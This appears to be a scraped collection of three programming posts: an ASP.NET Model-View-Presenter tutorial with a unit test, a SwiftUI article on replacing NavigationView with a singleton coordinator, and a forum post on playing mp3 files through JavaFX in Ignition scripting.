public partial class Default : MvpView<DefaultPresenter, IDefault>, IDefault
{
    protected void Page_Load(object sender, EventArgs e)
    {
    }

    #region IDefault Members

    public string Name
    {
        get { return lblName.Text; }
        set { lblName.Text = value; }
    }

    #endregion
}

Ok, now what? Well, now we simply add the business method in our presenter for fetching the name. In a real scenario this method would probably access a model which would load the name for the current user from a database somewhere. But for now, let's just set it to John Doe.

public class DefaultPresenter : MvpPresenter<IDefault>
{
    public void GetName()
    {
        View.Name = "John Doe";
    }
}

And last, but not least, let's call our presenter action from our view implementation:

public partial class Default : MvpView<DefaultPresenter, IDefault>, IDefault
{
    protected void Page_Load(object sender, EventArgs e)
    {
        if (!IsPostBack)
            Presenter.GetName();
    }

    #region IDefault Members

    public string Name
    {
        get { return lblName.Text; }
        set { lblName.Text = value; }
    }

    #endregion
}

Now why on earth did we write all that code? Yes indeed, why did we just add two extra files and some complexity to our application architecture? The simple answer is testability. If you think about it, we've just managed to extract all application logic from the code-behind into a separate class with a nice, clean API. We've also made sure that the presenter knows nothing about the class implementing the view interface, so we can supply it a pure container for test data.
All of this together adds up to the fact that we can now easily create a test project in .NET and apply unit testing to our application, like so:

public class DefaultTestView : IDefault
{
    public string Name { get; set; }
}

[TestClass]
public class DefaultTest
{
    [TestMethod]
    public void GetNameTest()
    {
        IDefault view = new DefaultTestView();
        DefaultPresenter presenter = new DefaultPresenter(view);

        presenter.GetName();

        Assert.AreEqual("John Doe", view.Name);
    }
}

I hope you found this tutorial useful.
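The testability argument does not depend on C# generics at all. As a language-neutral illustration (sketched in Python with hypothetical names; this is not part of the template), the same presenter-plus-fake-view test reduces to this:

```python
class GreetingPresenter:
    """Presenter holds the application logic and talks to the view
    only through its attributes; it never sees the concrete view
    class, so a web form and a test stub are interchangeable."""
    def __init__(self, view):
        self.view = view

    def get_name(self):
        # A real model would load this from a database.
        self.view.name = "John Doe"


class FakeView:
    """Pure data container standing in for the web form."""
    name = ""


view = FakeView()
GreetingPresenter(view).get_name()
assert view.name == "John Doe"
```

The point is the same as in the C# version: because the presenter only knows the view contract, the test never has to spin up a page, a request, or a web server.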
http://cdn.dreamincode.net/forums/topic/232502-implementing-the-mvp-pattern-in-aspnet/
SwiftUI. Is there life without NavigationView, or a few words about the coordinator

In distant, distant times, when iOS was still very young, developers, proudly called iOS developers, thought about customizing the navigation stack. Not that the navigation stack was bad (it fit perfectly into Apple's worldview), but the navigation bar was often a thorn in the side of users and designers. So developers used a simple trick: they hid the system bar in the application and showed their own panel instead, in their own interface design, with controls tied to the same push and pop methods available out of the box. Over time even Apple realized that it was impossible to live like this any longer and released iOS 7... How much negativity spilled over the heads of developers... But those who had learned how to customize the navigation bar came out of those dark times with dignity.

...until SwiftUI flickered on the horizon. And that is where the history lesson ends.

Developers who switch to SwiftUI sooner or later face the problem of unpredictable NavigationView behavior. This usually happens when you re-enter a previously displayed view in the navigation stack: for some reason the navigation bar shifts relative to its previously set position. And when using the container in conjunction with UIKit, it can lead to duplicated navigation. In addition, NavigationView causes a lot of problems when combined with other components. All this suggests that SwiftUI is too raw to be used in commercial projects. (Mind you, SwiftUI 4 has already been announced and will be available in iOS 16.)

Developers waited for years for Apple to fix the widely known, glaring navigation issues, and hope was raised by the announcement that NavigationView would be deprecated and SwiftUI 4 would introduce a new, friendlier navigation experience.
A study of this issue showed that it is now possible to write a little less code (which could easily have been achieved without Apple, simply by using switch instead of if), but the navigation problems did not disappear anywhere: all the same old problems appear in the new navigation components.

SwiftUI is too good to ignore because of its childhood illnesses. But, alas, many do exactly that, simply because they cannot work around the bugs that have set their teeth on edge. Moreover, professional communities often discuss whether it is possible to do without NavigationView at all. Surprisingly, it is not just easy; it is very simple. There are, however, a few pebbles on the way to a solution that you have to step over before moving on. Those who overcome them do not even remember the difficulties afterwards; the rest wait for a saving miracle from Apple, which, of course, is ready to lend a helping hand to those in need by making some changes regarding AnyView in Swift 5.7. True, all of this will only be available in the new iOS, and anyone who wants to continue working with an earlier deployment target will have to upgrade.

In discussions about how to get around the "problem", the concept of a "Coordinator" often comes up. For those with UIKit experience, the coordinator pattern is familiar, because it makes navigation easier and accessible from any part of the application. But those "born into the world" together with SwiftUI ask what this is all about, and do not understand how the pattern under discussion can help solve the navigation problem in their application. In fact, when it comes to a coordinator in SwiftUI, it all comes down to a much simpler solution than the one described for UIKit.

Let's say we want to navigate through a chain of views. It can be any some View, but for simplicity we will use colored views, each differing from the previous one in the sequence of rainbow colors.
The only special feature of such a view will be the presence of a "Back" button. Jumping to the extreme elements of the view stack is possible using simple calls from anywhere in the code:

Coordinator.next(state: .root)
Coordinator.next(state: .end)

Navigating the stack is done using simple UIKit-style navigation commands:

Coordinator.push(view: ColoredView(index: index + 1))
Coordinator.pop()

Here index is the number of the color in the colors array (from red to magenta). Looks simple? It seems that implementing ColoredView itself is a trainee-level task.

import SwiftUI

struct ColoredView: View {

    var index: Int = 0

    private (set) var colors: [Color] = [.red, .orange, .yellow, .green, .teal, .blue, .purple]

    var body: some View {
        ZStack {
            TitlePlace()
            HelloPlace()
            NextPlace()
            ModalaPlace()
            CoordinatorPlace()
        }
        .frame(maxWidth: .infinity, maxHeight: .infinity)
        .background(viewColor)
    }

    private var viewColor: Color {
        return colors[index]
    }

    private func HelloPlace() -> some View {
        VStack {
            Text("Hello, World!")
            Text("Index \(index)")
        }
        .foregroundColor(.white)
    }

    private func TitlePlace() -> some View {
        VStack {
            HStack {
                if index > 0 {
                    Button {
                        Coordinator.pop()
                    } label: {
                        Image(systemName: "arrow.left")
                            .foregroundColor(.white)
                    }
                    .padding()
                }
                Spacer()
            }
            .frame(height: 44)
            .frame(maxWidth: .infinity)
            Spacer()
        }
    }

    private func NextPlace() -> some View {
        VStack {
            if index < colors.count - 1 {
                Button {
                    Coordinator.push(view: ColoredView(index: index + 1))
                } label: {
                    Image(systemName: "arrow.right")
                        .foregroundColor(.white)
                }
            }
        }
        .offset(y: 44)
    }

    private func ModalaPlace() -> some View {
        VStack {
            Button {
                Coordinator.modal(view: ModalView())
            } label: {
                Text("SHOW MODAL")
                    .foregroundColor(.white)
                    .fontWeight(.heavy)
            }
        }
        .offset(y: 120)
    }

    private func CoordinatorPlace() -> some View {
        HStack {
            Button {
                Coordinator.next(state: .root)
            } label: {
                Text("ROOT")
                    .foregroundColor(.white)
                    .fontWeight(.heavy)
            }
            .padding()
            .border(.white, width: 1)

            Button {
                Coordinator.next(state: .end)
            } label: {
                Text("END")
                    .foregroundColor(.white)
                    .fontWeight(.heavy)
            }
            .padding()
            .border(.white, width: 1)
        }
        .offset(y: 200)
    }
}

Since the navigation stack is not the only way to navigate in the iOS world, a modal window was also added to the coordinator implementation, displayed full screen on top of any other window. In the proposed code it is presented in its simplest form, but it would not be difficult to add dimming, partial overlap, or blur to it. The implementations of ColoredView and ModalView differ only in the buttons in the window title, in accordance with common practice: the "Back" button returns to the previous view, while the button with a cross closes the modal window. And, logically, the modal window also closes when the final action is performed.

A little more interesting, but not much more complicated, is the coordinator class. First, there is a generic ContainerView structure:

struct ContainerView: View {

    var view: AnyView

    init<V>(view: V) where V: View {
        self.view = AnyView(view)
    }

    var body: some View {
        view
    }
}

Secondly, the entire coordinator is implemented as a singleton. A singleton is not the best practice in mobile development, but in this case it allows the code to be simplified to show the really important parts. You could use Dependency Injection (DI), a ServiceLocator, or an EnvironmentObject instead; any of these would work in a similar way.

Thirdly, since we are doing all these manipulations in SwiftUI, it would be unfair not to use MVVM, which easily brings reactivity to our application through ObservableObject.
import SwiftUI

let Coordinator = CoordinatorService.instance

struct ContainerView: View {

    var view: AnyView

    init<V>(view: V) where V: View {
        self.view = AnyView(view)
    }

    var body: some View {
        view
    }
}

final class CoordinatorService: ObservableObject {

    enum State {
        case root
        case end
    }

    static let instance = CoordinatorService()

    @Published var modalVisibled = false
    @Published var modalView: ContainerView!
    @Published var container: ContainerView!

    private var stack = [ContainerView]()

    private init() {
        self.push(view: ColoredView(index: 0))
    }

    func pop() {
        guard self.stack.count > 1 else { return }
        self.stack.remove(at: self.stack.count - 1)
        guard let last = self.stack.last else { return }
        self.container = last
    }

    func push<V: View>(view: V) {
        let containered = ContainerView(view: view)
        self.stack += [containered]
        self.container = containered
    }

    func modal<V: View>(view: V) {
        self.modalView = ContainerView(view: view)
        withAnimation {
            self.modalVisibled.toggle()
        }
    }

    func close() {
        withAnimation {
            self.modalVisibled.toggle()
        }
    }

    func next(state: State) {
        switch state {
        case .root:
            self.stack.removeAll()
            self.push(view: ColoredView())
        case .end:
            self.push(view: ColoredView(index: 6))
        }
    }
}

When an instance of the class is created, a view with index 0 is pushed onto the navigation stack, which corresponds to the red color in the well-known mnemonic: "Every hunter wants to know where the pheasant sits." In principle, it does not matter which view is pushed there; it is only important that there is at least some view. EmptyView is not well suited for this role, as it has no interactive controls.

The "push" and "modal" methods work with a generic view. Each of them takes a view, wraps it in the convenience container, and then assigns the container to the "observable" variables, which in turn updates the navigation windows. Additionally, the "push" method pushes the container onto the navigation stack.
The stack itself can be implemented in any number of ways; the one given here is quite obvious. The complementary "pop" method removes the last element from the stack and then shows the new last element through the "container" variable.

Usually, in addition to the "pop" method, a "popToRoot" method is also added. But then it would be difficult to answer the following question: "What does all this have to do with the coordinator pattern?" It is precisely to allow jumping to any target view that the "next" method was added, to which we pass our target. The target itself is described as a choice of states using switch. (Please do not confuse this with the State pattern; it is not meant here, although it could also be implemented and swapped in via switch. Within the framework of this article, a plain switch is much easier to understand.)

Finally, we need to implement the ContentView from which our application starts. It displays the value of the coordinator's container variable as its content, and when a modal window is launched, shows it on top of the current view.

import SwiftUI

struct ContentView: View {

    @ObservedObject private var coordinator = Coordinator

    var body: some View {
        ZStack {
            coordinator.container.view

            if coordinator.modalVisibled {
                coordinator.modalView
                    .transition(.move(edge: .bottom))
            }
        }
    }
}

In general, that's all. The demystification of the coordinator is complete.

The cherry on top is the visual hierarchy available in Xcode's Debug View Hierarchy. After a full pass through all seven views, the visual hierarchy contains only the last rendered view with a single view controller. Compare this with what usually happens when using UIKit.

Implementation details can be discussed in the telegram channel. The source code can be found here on GitHub.
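Stripped of the SwiftUI specifics (AnyView, @Published, animations), the coordinator is just a stack whose top element is the currently displayed view. Here is a minimal sketch of that state machine, in Python with hypothetical names and views modeled as plain strings, purely to show the push/pop/next logic:

```python
class Coordinator:
    """Navigation stack: `container` is always the top view."""

    def __init__(self, root="view-0"):
        self._stack = []
        self.push(root)  # a root view is pushed on creation

    @property
    def container(self):
        # The currently displayed view (top of the stack).
        return self._stack[-1]

    def push(self, view):
        self._stack.append(view)

    def pop(self):
        # Never pop the root view, mirroring the guard in pop() above.
        if len(self._stack) > 1:
            self._stack.pop()

    def next_root(self):
        # The coordinator-style jump: clear the stack, re-push root.
        self._stack.clear()
        self.push("view-0")


nav = Coordinator()
nav.push("view-1")
nav.push("view-2")
nav.pop()
assert nav.container == "view-1"
nav.next_root()
assert nav.container == "view-0"
```

In the real implementation the `container` property is @Published, so assigning a new top view is what triggers SwiftUI to re-render; the logic itself is no more than this.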
https://prog.world/swiftui-is-there-life-without-navigationview-or-a-few-words-about-the-coordinator/?amp
The Sound Player component and system.util.playSoundClip are wav-file only. Since wav files are simply huge compared to mp3, I decided to try out the JavaFX libraries. Here is my first runthrough.

Verified on my Windows machine. No time to check on Linux yet, but since JavaFX is included on x86/x64, I don't see why it wouldn't work. I can say it will not work on ARM (like a RasPi), since Oracle dropped JavaFX support. Which is sad, because that's what I really wanted it for...

This example plays the theme from Bonanza, because, well, why not? Also added a tag to monitor to stop the playback early, if needed.

from javafx.scene.media import AudioClip
from time import sleep

# Set path to audio file and tag used to stop playback.
audioFilePath = ''
stopFlagPath = '[default]Test/Audio/stopFlag'

# Load up the audio stream
plunk = AudioClip(audioFilePath)

# Play the audio stream
plunk.play()

# Check every so often to see if the stopFlag is active, and stop playback if true.
# Useful for long clips.
while plunk.isPlaying() == 1:
    stopFlag = system.tag.read(stopFlagPath).value
    if stopFlag == 1:
        plunk.stop()
    else:
        sleep(0.3)

# Reset the stop flag
system.tag.write(stopFlagPath, 0)
https://forum.inductiveautomation.com/t/play-an-mp3-file-yes-yes-you-can/15219